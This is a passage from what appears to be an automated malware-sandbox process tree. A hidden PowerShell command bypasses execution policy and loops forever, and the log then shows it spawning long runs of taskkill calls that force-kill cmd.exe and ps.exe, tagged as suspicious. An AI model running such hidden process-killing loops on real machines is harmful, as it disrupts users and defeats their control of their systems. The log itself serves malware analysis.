      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4900
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3296
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2816
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3780
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4532
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4704
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3980
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4868
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4088
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3112
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4044
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:380
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4664
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3600
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3692
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4364
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3732
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2456
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:4180
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4224
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1468
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2444
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3080
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4788
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4140
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      Kills process with taskkill
      PID:576
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:2764
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:3876
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:5112
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4928
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4688
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:1284
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4532
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4012
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im cmd.exe
      4⤵
      PID:4892
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im ps.exe}"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3708
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4724
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3700
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4392
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4216
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4844
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3616
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1540
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2368
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2292
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5044
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4976
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4696
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3824
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3180
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1216
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1752
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1988
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4520
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1248
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4184
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4892
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4916
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1592
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4132
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4196
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4996
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2648
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3868
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3912
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4816
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4244
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4820
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2676
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4796
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3924
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4928
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5040
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3820
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4544
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3512
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3108
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3964
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4896
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3356
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5032
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1464
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4040
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1944
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3940
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4844
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1100
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3404
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3424
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3676
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4384
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4312
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4856
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4300
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3916
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3344
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2184
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4912
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3408
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5036
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1668
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4228
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:528
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4780
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3892
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4884
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3960
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3168
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2372
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3612
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3604
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3828
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3700
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3664
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4044
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3232
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3916
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3980
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4900
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4104
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4448
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4220
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2832
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1092
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Kills process with taskkill
      PID:3576
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3344
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Kills process with taskkill
      PID:3840
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Kills process with taskkill
      PID:3048
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4120
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4408
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4216
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:688
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4888
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2900
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3172
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3848
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3200
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2364
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3796
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3996
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2580
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4844
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3968
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3120
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5020
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2860
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4180
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3108
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2448
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:1444
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3504
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:5068
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2292
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2344
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3812
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4768
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4336
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4032
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4560
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3116
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4708
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4936
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4644
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3288
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3984
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:3076
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2500
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4396
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4776
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:2056
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4664
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /f /im ps.exe
      4⤵
      PID:4996
